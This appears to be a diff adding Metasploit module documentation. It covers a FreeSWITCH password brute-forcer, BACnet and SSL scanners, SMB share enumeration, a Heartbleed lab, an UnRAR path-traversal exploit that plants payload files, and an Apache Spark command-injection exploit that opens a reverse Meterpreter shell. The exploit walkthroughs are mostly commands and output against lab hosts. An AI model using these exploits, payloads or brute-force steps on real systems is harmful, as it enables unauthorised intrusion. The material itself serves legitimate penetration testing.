+-v /home/deploy/log:/usr/local/freeswitch/log  \
+-v /home/deploy/sounds:/usr/local/freeswitch/sounds \
+-v /home/deploy/recordings:/usr/local/freeswitch/recordings \
+drachtio/drachtio-freeswitch-mrf freeswitch --sip-port 5038 --tls-port 5039 --rtp-range-start 20000 --rtp-range-end 21000 --password hunter
+```
+
+## Verification Steps
+1. Do: `use auxiliary/scanner/misc/freeswitch_event_socket_login`
+2. Do: `set RHOSTS [ips]`
+3. Do: `set PASS_FILE /home/kali/passwords.txt`
+4. Do: `run`
+
+## Options
+### PASS_FILE
+The file containing a list of passwords to try logging in with.
+
+## Scenarios
+### FreeSWITCH 1.10.7 Linux Debian 10.11 (Docker Image)
+```
+msf6 > use auxiliary/scanner/misc/freeswitch_event_socket_login
+msf6 auxiliary(scanner/misc/freeswitch_event_socket_login) > set RHOSTS 192.168.56.1
+RHOSTS => 192.168.56.1
+msf6 auxiliary(scanner/misc/freeswitch_event_socket_login) > set PASS_FILE /home/kali/passwords.txt
+PASS_FILE => /home/kali/passwords.txt
+msf6 auxiliary(scanner/misc/freeswitch_event_socket_login) > run
+
+[!] 192.168.56.1:8021        - No active DB -- Credential data will not be saved!
+[-] 192.168.56.1:8021        - 192.168.56.1:8021 - LOGIN FAILED: ClueCon (Incorrect: -ERR invalid)
+[-] 192.168.56.1:8021        - 192.168.56.1:8021 - LOGIN FAILED: admin (Incorrect: -ERR invalid)
+[-] 192.168.56.1:8021        - 192.168.56.1:8021 - LOGIN FAILED: 123456 (Incorrect: -ERR invalid)
+[-] 192.168.56.1:8021        - 192.168.56.1:8021 - LOGIN FAILED: 12345 (Incorrect: -ERR invalid)
+[-] 192.168.56.1:8021        - 192.168.56.1:8021 - LOGIN FAILED: 123456789 (Incorrect: -ERR invalid)
+[-] 192.168.56.1:8021        - 192.168.56.1:8021 - LOGIN FAILED: password (Incorrect: -ERR invalid)
+[+] 192.168.56.1:8021        - 192.168.56.1:8021 - Login Successful: hunter (Successful: +OK accepted)
+[*] 192.168.56.1:8021        - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,74 @@
+## Vulnerable Application
+BACnet is a Data Communication Protocol for Building Automation and Control Networks.
+Developed under the auspices of the American Society of Heating,
+ Refrigerating and Air-Conditioning Engineers (ASHRAE), BACnet is an American national standard,
+ a European standard, a national standard in more than 30 countries, and an ISO global standard.
+ The protocol is supported and maintained by ASHRAE Standing Standard Project Committee 135
+
+This script polls bacnet devices with a l3 broadcast Who-is message
+and for each reply communicates further to discover more data and saves the data into metasploit.
+Each bacnet device responds with this data:
+- It's IP address, and BACnet/IP address (if the device is nested).
+- It's device number.
+- Model name.
+- Application software version.
+- Firmware revision.
+- Device description.
+## Verification Steps
+
+  1. Start msfconsole.
+  2. Do: `use auxiliary/scanner/scada/bacnet_l3`.
+  3. Do: `set INTERFACE`.
+  5. Do: `run`.
+  6. Devices running the BACnet protocol should respond with data.
+
+## Options
+A user can choose between the interfaces of his host (e.g. eth1, ens192...),
+the number of Who-is packets to send - for reliability purposes, the time (in seconds) to wait for packets to arrive
+and the UDP port, the default is 47808.
+
+The user can always check these options via the `show options` command.
+
+```
+msf auxiliary(profinet_siemens) > show options
+
+Module options (auxiliary/scanner/scada/bacnet_l3):
+
+Name       Current Setting  Required  Description
+----       ---------------  --------  -----------
+COUNT      1                yes       The number of times to send each packet
+INTERFACE  eth1             yes       The interface to scan from
+PORT       47808            yes       BACnet/IP UDP port to scan (usually between 47808-47817)
+TIMEOUT    1                yes       The socket connect timeout in seconds
+```
+
+## Scenarios
+
+The following demonstrates a basic scenario, we "detect" two devices:
+
+```
+
+msf > use auxiliary/scanner/scada/bacnet_l3
+msf auxiliary(auxiliary/scanner/scada/bacnet_l3) > run
+
+[*] Broadcasting Who-is via eth1
+[*] found 2 devices
+[*] Querying device number 826001 in ip 192.168.13.11
+[*] Querying device number 4194303 in ip 192.168.13.12
+[*] Done scanning
+[+] for asset number 826001:
+        model name: iSMA-B-4U4A-H-IP
+        firmware revision: 6.2
+        application software version: GC5 6.2
+        description: BACnet iSMA-B-4U4A-H-IP Module
+
+[+] for asset number 4194303:
+        model name: PXG3.L-1
+        firmware revision: FW=01.21.30.38;WPC=1.4.131;SVS-300:SBC=13.21;
+        application software version:
+        description: BacnetRouter
+
+[+] Successfully saved data to local store named bacnet-discovery.xml
+[*] Done.
+[*] Auxiliary module execution completed
+```
@@ -1,15 +1,49 @@
-## Description
+## Vulnerable Application
+
+This module has been tested successfully against:
+- Windows server 2019
+- Windows server 2016
+- Windows 10
+
+### Description

 The `smb_enumshares` module, as would be expected, enumerates any SMB shares that are available on a remote system.
 The module can also recursively go through each directory in each share and gather information about the files inside them.
 On some systems such as Windows 7, it can also iterate over user directories and `%appdata%`.

+## Options
+
+```
+set RHOSTS [string]
+```
+This is the target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit for more information.
+
+```
+set SpiderProfiles [boolean]
+```
+This is used to enable the module to only spider user profiles when share is a disk share.
+
+```
+set SpiderShares [boolean]
+```
+This is used to enable the module to spider shares recursively.
+
+```
+set ShowFiles [boolean]
+```
+This is used to enable the module to show detailed information when spidering.
+
+```
+set Share [string]
+```
+Can be set to only enumerate over a specific share.
+
 ## Verification Steps

-1. Do: ```use auxiliary/scanner/smb/smb_enumshares```
-2. Do: ```set RHOSTS [IP]```
-3. Do: ```set THREADS [number of threads]```
-4. Do: ```run```
+1. Do: `use auxiliary/scanner/smb/smb_enumshares`
+2. Do: `set RHOSTS [IP]`
+3. Do: `set THREADS [number of threads]`
+4. Do: `run`

 ## Scenarios

@@ -59,3 +93,31 @@ msf6 auxiliary(scanner/smb/smb_enumshares) > run
 [*] Auxiliary module execution completed
 ```
 The disconnect on port 139 happens because Windows 10 uses SMB3, which operates on port 445 instead.
+
+### Credentialed - Windows server 2019
+
+This scenario makes use of the `Share` option, that is used to pass a specific share to be enumerated. The module is
+also being ran with inline options in this scenario.
+
+```
+msf6 auxiliary(scanner/smb/smb_enumshares) > run smb://<Account>:<Password>@<TargetIP> spidershares=true showfiles=true share=<Share directory name>
+
+[*] <TargetIP>   - Starting module
+[-] <TargetIP>   - Login Failed: The SMB server did not reply to our request
+[*] <TargetIP>   - Starting module
+[!] <TargetIP>   - peer_native_os is only available with SMB1 (current version: SMB3)
+[!] <TargetIP>   - peer_native_lm is only available with SMB1 (current version: SMB3)
+[+] <TargetIP>   - my_share - (DISK)
+[+] <TargetIP>   -  \\VB\my_share
+==============
+
+ Type  Name            Created                    Accessed                   Written                    Changed                    Size
+ ----  ----            -------                    --------                   -------                    -------                    ----
+ FILE  Passwords.txt   2022-10-12T11:41:51+01:00  2022-10-12T11:41:51+01:00  2022-10-12T11:41:51+01:00  2022-10-12T17:08:44+01:00  0
+ FILE  paSsWords1.txt  2022-10-12T11:52:00+01:00  2022-10-12T11:52:00+01:00  2022-10-12T11:52:00+01:00  2022-10-12T17:08:59+01:00  0
+ FILE  test.txt        2022-10-07T17:49:36+01:00  2022-10-07T17:49:36+01:00  2022-10-07T17:49:36+01:00  2022-10-07T17:49:39+01:00  0
+
+[+] 192.168.175.129:445   - info saved in: /Users/<user>/.msf4/loot/20221026120037_default_192.168.175.129_smb.enumshares_935447.txt
+[*] smb://<Account>:<Password>@<TargetIP>: - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -25,6 +25,35 @@ openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -node
 If you receive `gethostbyname failure` error in `openssl`, add the client (metasploit)
 IP and hostname to your hosts file.

+### Using docker
+
+Using the environment created by [vulhub](https://github.com/vulhub/vulhub/tree/master/openssl/CVE-2014-0160)
+
+First create a new docker-compose file:
+
+```
+version: '2'
+services:
+ nginx:
+   image: vulhub/openssl:1.0.1c-with-nginx
+   ports:
+    - "8080:80"
+    - "8443:443"
+```
+
+Then run `docker-compose up` and verify that the service is running with:
+
+```
+$ curl https://localhost:8443 -k
+<html>
+<head><title>404 Not Found</title></head>
+<body bgcolor="white">
+<center><h1>404 Not Found</h1></center>
+<hr><center>nginx/1.11.13</center>
+</body>
+</html>
+```
+
 ## Verification Steps

  1. Install a vulnerable OpenSSL, start the service
@@ -0,0 +1,139 @@
+## Vulnerable Application
+
+### Description
+Check if a server supports a given version of SSL/TLS and cipher suites.
+
+The certificate is stored in loot, and any known vulnerabilities against that
+SSL version and cipher suite combination are checked. These checks include
+POODLE, deprecated protocols, expired/not valid certs, low key strength, null cipher suites,
+certificates signed with MD5, DROWN, RC4 ciphers, exportable ciphers, LOGJAM, and BEAST.
+
+## Options
+
+### SSLVersion
+
+Which SSL/TLS Version to use. `all` implies all SSL/TLS versions which are usable by the metasploit + ruby + OpenSSL
+versions installed on the system. List is dynamically generated. Defaults to `all`
+
+### SSLCipher
+
+Which SSL/TLS Cipher to use. `all` implies all ciphers avaiable for the version of SSL/TLS being used and which
+are usable by the metasploit + ruby + OpenSSL versions installed on the system.
+List is dynamically generated. Defaults to `all`
+
+## Verification Steps
+
+1. Do: `use auxiliary/scanner/ssl/ssl_version`
+2. Do: `set RHOSTS [IP]`
+3. Do: `set THREADS [num of threads]`
+4. Do: `run`
+
+## Scenarios
+
+### No issues found
+
+An example run against `google.com`, no real issues as expected.
+
+```
+msf6 > use auxiliary/scanner/ssl/ssl_version
+msf6 auxiliary(scanner/ssl/ssl_version) > set RHOSTS 172.217.12.238
+RHOSTS => 172.217.12.238
+msf6 auxiliary(scanner/ssl/ssl_version) > run
+
+[+] 172.217.12.238:443    - Connected with SSL Version: TLSv1.2, Cipher: ECDHE-RSA-AES256-GCM-SHA384
+[+] 172.217.12.238:443    - Certificate saved to loot: /home/gwillcox/.msf4/loot/20221107150747_default_172.217.12.238_ssl.certificate_342145.txt
+[*] 172.217.12.238:443    - Certificate Information:
+[*] 172.217.12.238:443    -   Subject: /CN=*.google.com
+[*] 172.217.12.238:443    -   Issuer: /C=US/O=Google Trust Services LLC/CN=GTS CA 1C3
+[*] 172.217.12.238:443    -   Signature Alg: sha256WithRSAEncryption
+[*] 172.217.12.238:443    -   Public Key Size: 2048 bits
+[*] 172.217.12.238:443    -   Not Valid Before: 2022-10-17 08:16:43 UTC
+[*] 172.217.12.238:443    -   Not Valid After: 2023-01-09 08:16:42 UTC
+[*] 172.217.12.238:443    -   CA Issuer: http://pki.goog/repo/certs/gts1c3.der
+[*] 172.217.12.238:443    -   Has common name *.google.com
+[+] 172.217.12.238:443    - Connected with SSL Version: TLSv1.2, Cipher: ECDHE-RSA-CHACHA20-POLY1305
+[+] 172.217.12.238:443    - Connected with SSL Version: TLSv1.2, Cipher: ECDHE-RSA-AES128-GCM-SHA256
+[+] 172.217.12.238:443    - Connected with SSL Version: TLSv1.2, Cipher: AES256-GCM-SHA384
+[+] 172.217.12.238:443    - Connected with SSL Version: TLSv1.2, Cipher: AES128-GCM-SHA256
+[*] 172.217.12.238:443    - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/ssl/ssl_version) > show options
+
+Module options (auxiliary/scanner/ssl/ssl_version):
+
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   RHOSTS      172.217.12.238   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT       443              yes       The target port (TCP)
+   SSLCipher   All              yes       SSL cipher to test (Accepted: All, TLS_AES_256_GCM_SHA384, TLS_CHACHA20_POLY1305_SHA256, TLS_AES_128_GCM_SHA256, ECDHE-ECDSA-AES256-GCM-SHA384, ECDHE-RSA-A
+                                          ES256-GCM-SHA384, DHE-RSA-AES256-GCM-SHA384, ECDHE-ECDSA-CHACHA20-POLY1305, ECDHE-RSA-CHACHA20-POLY1305, DHE-RSA-CHACHA20-POLY1305, ECDHE-ECDSA-AES128-GCM-
+                                          SHA256, ECDHE-RSA-AES128-GCM-SHA256, DHE-RSA-AES128-GCM-SHA256, ECDHE-ECDSA-AES256-SHA384, ECDHE-RSA-AES256-SHA384, DHE-RSA-AES256-SHA256, ECDHE-ECDSA-AES1
+                                          28-SHA256, ECDHE-RSA-AES128-SHA256, DHE-RSA-AES128-SHA256, ECDHE-ECDSA-AES256-SHA, ECDHE-RSA-AES256-SHA, DHE-RSA-AES256-SHA, ECDHE-ECDSA-AES128-SHA, ECDHE-
+                                          RSA-AES128-SHA, DHE-RSA-AES128-SHA, RSA-PSK-AES256-GCM-SHA384, DHE-PSK-AES256-GCM-SHA384, RSA-PSK-CHACHA20-POLY1305, DHE-PSK-CHACHA20-POLY1305, ECDHE-PSK-C
+                                          HACHA20-POLY1305, AES256-GCM-SHA384, PSK-AES256-GCM-SHA384, PSK-CHACHA20-POLY1305, RSA-PSK-AES128-GCM-SHA256, DHE-PSK-AES128-GCM-SHA256, AES128-GCM-SHA256,
+                                           PSK-AES128-GCM-SHA256, AES256-SHA256, AES128-SHA256, ECDHE-PSK-AES256-CBC-SHA384, ECDHE-PSK-AES256-CBC-SHA, SRP-RSA-AES-256-CBC-SHA, SRP-AES-256-CBC-SHA,
+                                          RSA-PSK-AES256-CBC-SHA384, DHE-PSK-AES256-CBC-SHA384, RSA-PSK-AES256-CBC-SHA, DHE-PSK-AES256-CBC-SHA, AES256-SHA, PSK-AES256-CBC-SHA384, PSK-AES256-CBC-SHA
+                                          , ECDHE-PSK-AES128-CBC-SHA256, ECDHE-PSK-AES128-CBC-SHA, SRP-RSA-AES-128-CBC-SHA, SRP-AES-128-CBC-SHA, RSA-PSK-AES128-CBC-SHA256, DHE-PSK-AES128-CBC-SHA256
+                                          , RSA-PSK-AES128-CBC-SHA, DHE-PSK-AES128-CBC-SHA, AES128-SHA, PSK-AES128-CBC-SHA256, PSK-AES128-CBC-SHA)
+   SSLVersion  All              yes       SSL version to test (Accepted: All, SSLv3, TLSv1.0, TLSv1.2, TLSv1.3)
+   THREADS     1                yes       The number of concurrent threads (max one per host)
+
+msf6 auxiliary(scanner/ssl/ssl_version) > 
+```
+
+### Expired certificate
+
+```
+msf6 > use auxiliary/scanner/ssl/ssl_version
+msf6 auxiliary(scanner/ssl/ssl_version) > set RHOSTS expired.badssl.com
+RHOSTS => expired.badssl.com
+msf6 auxiliary(scanner/ssl/ssl_version) > run
+
+[+] 104.154.89.105:443    - Connected with SSL Version: TLSv1.2, Cipher: ECDHE-RSA-AES256-GCM-SHA384
+[+] 104.154.89.105:443    - Certificate saved to loot: /home/gwillcox/.msf4/loot/20221107150939_default_104.154.89.105_ssl.certificate_786557.txt
+[*] 104.154.89.105:443    - Certificate Information:
+[*] 104.154.89.105:443    -   Subject: /C=US/ST=California/L=San Francisco/O=BadSSL Fallback. Unknown subdomain or no SNI./CN=badssl-fallback-unknown-subdomain-or-no-sni
+[*] 104.154.89.105:443    -   Issuer: /C=US/ST=California/L=San Francisco/O=BadSSL/CN=BadSSL Intermediate Certificate Authority
+[*] 104.154.89.105:443    -   Signature Alg: sha256WithRSAEncryption
+[*] 104.154.89.105:443    -   Public Key Size: 2048 bits
+[*] 104.154.89.105:443    -   Not Valid Before: 2016-08-08 21:17:05 UTC
+[*] 104.154.89.105:443    -   Not Valid After: 2018-08-08 21:17:05 UTC
+[+] 104.154.89.105:443    -   Certificate contains no CA Issuers extension... possible self signed certificate
+[*] 104.154.89.105:443    -   Has common name badssl-fallback-unknown-subdomain-or-no-sni
+[+] 104.154.89.105:443    - Certificate expired: 2018-08-08 21:17:05 UTC
+[+] 104.154.89.105:443    - Connected with SSL Version: TLSv1.2, Cipher: DHE-RSA-AES256-GCM-SHA384
+[+] 104.154.89.105:443    - Connected with SSL Version: TLSv1.2, Cipher: ECDHE-RSA-AES128-GCM-SHA256
+[+] 104.154.89.105:443    - Connected with SSL Version: TLSv1.2, Cipher: DHE-RSA-AES128-GCM-SHA256
+[+] 104.154.89.105:443    - Connected with SSL Version: TLSv1.2, Cipher: ECDHE-RSA-AES256-SHA384
+[+] 104.154.89.105:443    - Connected with SSL Version: TLSv1.2, Cipher: DHE-RSA-AES256-SHA256
+[+] 104.154.89.105:443    - Connected with SSL Version: TLSv1.2, Cipher: ECDHE-RSA-AES128-SHA256
+[+] 104.154.89.105:443    - Connected with SSL Version: TLSv1.2, Cipher: DHE-RSA-AES128-SHA256
+[+] 104.154.89.105:443    - Connected with SSL Version: TLSv1.2, Cipher: AES256-GCM-SHA384
+[+] 104.154.89.105:443    - Connected with SSL Version: TLSv1.2, Cipher: AES128-GCM-SHA256
+[+] 104.154.89.105:443    - Connected with SSL Version: TLSv1.2, Cipher: AES256-SHA256
+[+] 104.154.89.105:443    - Connected with SSL Version: TLSv1.2, Cipher: AES128-SHA256
+[*] expired.badssl.com:443 - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/ssl/ssl_version) > show options
+
+Module options (auxiliary/scanner/ssl/ssl_version):
+
+   Name        Current Setting     Required  Description
+   ----        ---------------     --------  -----------
+   RHOSTS      expired.badssl.com  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT       443                 yes       The target port (TCP)
+   SSLCipher   All                 yes       SSL cipher to test (Accepted: All, TLS_AES_256_GCM_SHA384, TLS_CHACHA20_POLY1305_SHA256, TLS_AES_128_GCM_SHA256, ECDHE-ECDSA-AES256-GCM-SHA384, ECDHE-RS
+                                             A-AES256-GCM-SHA384, DHE-RSA-AES256-GCM-SHA384, ECDHE-ECDSA-CHACHA20-POLY1305, ECDHE-RSA-CHACHA20-POLY1305, DHE-RSA-CHACHA20-POLY1305, ECDHE-ECDSA-AES12
+                                             8-GCM-SHA256, ECDHE-RSA-AES128-GCM-SHA256, DHE-RSA-AES128-GCM-SHA256, ECDHE-ECDSA-AES256-SHA384, ECDHE-RSA-AES256-SHA384, DHE-RSA-AES256-SHA256, ECDHE-E
+                                             CDSA-AES128-SHA256, ECDHE-RSA-AES128-SHA256, DHE-RSA-AES128-SHA256, ECDHE-ECDSA-AES256-SHA, ECDHE-RSA-AES256-SHA, DHE-RSA-AES256-SHA, ECDHE-ECDSA-AES128
+                                             -SHA, ECDHE-RSA-AES128-SHA, DHE-RSA-AES128-SHA, RSA-PSK-AES256-GCM-SHA384, DHE-PSK-AES256-GCM-SHA384, RSA-PSK-CHACHA20-POLY1305, DHE-PSK-CHACHA20-POLY13
+                                             05, ECDHE-PSK-CHACHA20-POLY1305, AES256-GCM-SHA384, PSK-AES256-GCM-SHA384, PSK-CHACHA20-POLY1305, RSA-PSK-AES128-GCM-SHA256, DHE-PSK-AES128-GCM-SHA256,
+                                             AES128-GCM-SHA256, PSK-AES128-GCM-SHA256, AES256-SHA256, AES128-SHA256, ECDHE-PSK-AES256-CBC-SHA384, ECDHE-PSK-AES256-CBC-SHA, SRP-RSA-AES-256-CBC-SHA,
+                                             SRP-AES-256-CBC-SHA, RSA-PSK-AES256-CBC-SHA384, DHE-PSK-AES256-CBC-SHA384, RSA-PSK-AES256-CBC-SHA, DHE-PSK-AES256-CBC-SHA, AES256-SHA, PSK-AES256-CBC-SH
+                                             A384, PSK-AES256-CBC-SHA, ECDHE-PSK-AES128-CBC-SHA256, ECDHE-PSK-AES128-CBC-SHA, SRP-RSA-AES-128-CBC-SHA, SRP-AES-128-CBC-SHA, RSA-PSK-AES128-CBC-SHA256
+                                             , DHE-PSK-AES128-CBC-SHA256, RSA-PSK-AES128-CBC-SHA, DHE-PSK-AES128-CBC-SHA, AES128-SHA, PSK-AES128-CBC-SHA256, PSK-AES128-CBC-SHA)
+   SSLVersion  All                 yes       SSL version to test (Accepted: All, SSLv3, TLSv1.0, TLSv1.2, TLSv1.3)
+   THREADS     1                   yes       The number of concurrent threads (max one per host)
+
+msf6 auxiliary(scanner/ssl/ssl_version) > 
+```
@@ -0,0 +1,141 @@
+## Vulnerable Application
+
+This module exploits a symlink-based path traversal vulnerability in UnRAR 6.11 and earlier (open source version 6.1.6 and earlier). You can get the vulnerable versions here:
+
+* [Vulnerable unRAR version](https://www.rarlab.com/rar/rarlinux-x64-611.tar.gz)
+* [Github commit](https://github.com/pmachapman/unrar/commit/22b52431a0581ab5d687747b65662f825ec03946)
+
+This module creates a generic RAR file containing whatever `PAYLOAD` the user configured.
+
+## Verification Steps
+
+To generate the .rar file:
+
+```
+msf6 > use exploit/linux/fileformat/unrar_cve_2022_30333
+[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set RHOSTS 10.0.0.154
+RHOSTS => 10.0.0.154
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set LHOST 10.0.0.146
+LHOST => 10.0.0.146
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set TARGET_PATH ../../../../../../tmp/docstest.txt
+TARGET_PATH => ../../../../../../tmp/docstest.txt
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > exploit
+
+[*] Target filename: ../../../../../../tmp/docstest.txt
+[+] payload.rar stored at /home/ron/.msf4/local/payload.rar
+```
+
+Then, with a vulnerable versions of UnRAR (see the link above), extract it:
+
+```
+ron@fedora ~/shared/analysis/zimbra-unrar/rar $ ./unrar x -o+ ~/.msf4/local/payload.rar
+
+UNRAR 6.11 freeware      Copyright (c) 1993-2022 Alexander Roshal
+
+Extracting from /home/ron/.msf4/local/payload.rar
+
+Extracting  hhgdzigwkgv                                               OK 
+Extracting  hhgdzigwkgv                                               OK 
+All OK
+ron@fedora ~/shared/analysis/zimbra-unrar/rar $ ls -l hhgdzigwkgv 
+lrwxrwxrwx. 1 ron games 34 Jul 27 13:04 hhgdzigwkgv -> ../../../../../../tmp/docstest.txt
+
+ron@fedora ~/shared/analysis/zimbra-unrar/rar $ file /tmp/docstest.txt
+/tmp/docstest.txt: data
+```
+
+## Options
+
+### `FILENAME`
+
+The filename to generate, typically it's `payload.rar` and that works fine.
+
+### `TARGET_PATH`
+
+The path, including traversal characters (`../`) and the filename. The slashes' direction doesn't matter, that gets fixed in the module.
+
+### `SYMLINK_FILENAME`
+
+If set, use a specific filename for the symlink inside the RAR file - default (random) is almost always best.
+
+### `CUSTOM_PAYLOAD`
+
+If set, instead of encoding the configured payload, encode data from the given filename.
+
+## Scenarios
+
+This is a pretty generic exploit that can be used against any software with a bad version of UnRAR.
+
+We also built a specific exploit for Zimbra - `exploit/linux/http/zimbra_unrar_cve_2022_30333`.
+
+### Built-in payload
+
+```
+msf6 > use exploit/linux/fileformat/unrar_cve_2022_30333
+[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set LHOST 10.0.0.146
+LHOST => 10.0.0.146
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set TARGET_PATH ../../../../../../../../tmp/evil.bin
+TARGET_PATH => ../../../../../../../../tmp/evil.bin
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > exploit
+
+[*] Target filename: ../../../../../../../../tmp/evil.bin
+[*] Encoding configured payload
+[+] payload.rar stored at /home/ron/.msf4/local/payload.rar
+```
+
+Then:
+
+```
+ron@fedora ~/.msf4/local $ ~/tools/unrar/unrar x -o+ ./payload.rar
+
+UNRAR 6.11 freeware      Copyright (c) 1993-2022 Alexander Roshal
+
+
+Extracting from ./payload.rar
+
+Extracting  xkmcxqotn                                                 OK 
+Extracting  xkmcxqotn                                                 OK 
+All OK
+ron@fedora ~/.msf4/local $ file /tmp/evil.bin
+/tmp/evil.bin: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
+```
+
+### Custom payload
+
+```
+msf6 > use exploit/linux/fileformat/unrar_cve_2022_30333
+[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set LHOST 10.0.0.146
+LHOST => 10.0.0.146
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set TARGET_PATH ../../../../../../../../tmp/evil.sh
+TARGET_PATH => ../../../../../../../../tmp/evil.sh
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > echo -ne "#!/bin/bash\nwhoami\n" > /tmp/test.sh
+[*] exec: echo -ne "#!/bin/bash\nwhoami\n" > /tmp/test.sh
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set CUSTOM_PAYLOAD /tmp/test.sh
+CUSTOM_PAYLOAD => /tmp/test.sh
+```
+
+Then:
+
+```
+ron@fedora ~/.msf4/local $ ~/tools/unrar/unrar x -o+ ./payload.rar
+
+UNRAR 6.11 freeware      Copyright (c) 1993-2022 Alexander Roshal
+
+
+Extracting from ./payload.rar
+
+Extracting  jwbhkf                                                    OK 
+Extracting  jwbhkf                                                    OK 
+All OK
+ron@fedora ~/.msf4/local $ bash /tmp/evil.sh
+ron
+/tmp/evil.sh: line 4: $'\177P\336': command not found
+[...]
+```
+
+(The errors at the bottom are because we append random junk to the end for padding)
+
+
@@ -0,0 +1,184 @@
+## Vulnerable Application
+
+This module exploits a remote code execution vulnerability (CVE-2022-33891) of Apache Spark.
+The Apache Spark UI offers the possibility to enable ACLs via the configuration option `spark.acls.enable`.
+With an authentication filter, this checks whether a user has access permissions to view or modify the application.
+The permission check is coded using a bash command shell and the unix id command that allows a malicious shell command injection.
+
+Ironically the `spark.acls.enable` configuration setting is designed to improve the security access within the Spark application,
+but unfortunately this configuration setting triggers the vulnerable code below.
+
+```
+private def getUnixGroups(username: String): Set[String] = {
+    val cmdSeq = Seq("bash", "-c", "id -Gn " + username)
+    // we need to get rid of the trailing "\n" from the result of command execution
+    Utils.executeAndGetOutput(cmdSeq).stripLineEnd.split(" ").toSet
+    Utils.executeAndGetOutput(idPath ::  "-Gn" :: username :: Nil).stripLineEnd.split(" ").toSet
+  }
+}
+```
+
+This will result in arbitrary shell command execution as the user `Spark`.
+
+This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1
+
+Installing a vulnerable version of Apache Spark to test this vulnerability is quite easy.
+
+To set the server up use the following docker-compose.yml file and follow the steps below:
+```
+version: '2'
+
+services:
+  spark:
+    image: docker.io/bitnami/spark:3.1.1
+    environment:
+      - SPARK_MODE=master
+      - SPARK_RPC_AUTHENTICATION_ENABLED=no
+      - SPARK_RPC_ENCRYPTION_ENABLED=no
+      - SPARK_LOCAL_STORAGE_ENCRYPTION_ENABLED=no
+      - SPARK_SSL_ENABLED=no
+    ports:
+      - '8080:8080'
+```
+
+1. Create the docker-compose.yml in your preferred directory and run `docker-compose up`. Let the container spin up.
+1. In a new terminal, enter `sudo docker exec -it spark_spark_1 /bin/bash`
+1. In the container bash session, enter: `echo "spark.acls.enable true" >> conf/spark-defaults.conf`
+1. cat the contents of spark-defaults.conf to make sure it looks good.
+1. Exit the interactive bash shell and Ctrl-C your docker-compose process.
+1. Once the containers have powered down gracefully, rerun `docker-compose up`
+
+Once the server and application is up, it's vulnerable and you can access it on port 8080 for testing...
+
+## Verification Steps
+
+1. `use exploit/linux/http/apache_spark_rce_cve_2022_33891`
+1. `set RHOSTS <TARGET HOSTS>`
+1. `set LHOST <Address of Attacking Machine>`
+1. `exploit`
+1. You should get a shell or meterpreter as the `spark` user.
+
+## Options
+
+No specific options to be set.
+
+## Scenarios
+
+### Apache Spark version 3.1.1 on Linux 5.10.104-linuxkit with spark.acls.enable set to true
+
+```
+msf6 > use exploit/linux/http/apache_spark_rce_cve_2022_33891
+[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(linux/http/apache_spark_rce_cve_2022_33891) > set lhost 192.168.100.7
+lhost => 192.168.100.7
+msf6 exploit(linux/http/apache_spark_rce_cve_2022_33891) > set rhosts 192.168.100.43
+rhosts => 192.168.100.43
+msf6 exploit(linux/http/apache_spark_rce_cve_2022_33891) > options
+
+Module options (exploit/linux/http/apache_spark_rce_cve_2022_33891):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.100.43   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT      8080             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       The URI of the vulnerable instance
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/unix/python/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.100.7    yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix (In-Memory)
+
+
+msf6 exploit(linux/http/apache_spark_rce_cve_2022_33891) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.7:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.100.43:8080 can be exploited!
+[*] Perform sleep test of 10 seconds...
+[+] The target is vulnerable. Sleep was around 10 seconds [10.033867019]!
+[*] Exploiting...
+[*] Sending stage (40164 bytes) to 192.168.100.43
+[-] Meterpreter session 3 is not valid and will be closed
+[*] 192.168.100.43 - Meterpreter session 3 closed.
+[*] Sending stage (40168 bytes) to 192.168.100.43
+[*] Meterpreter session 4 opened (192.168.100.7:4444 -> 192.168.100.43:62618) at 2022-08-26 10:49:46 +0000
+
+meterpreter > sysinfo
+Computer     : 7a26a9fb7ce3
+OS           : Linux 5.10.104-linuxkit #1 SMP Thu Mar 17 17:08:06 UTC 2022
+Architecture : x64
+Meterpreter  : python/linux
+meterpreter > getuid
+Server username: spark
+```
+
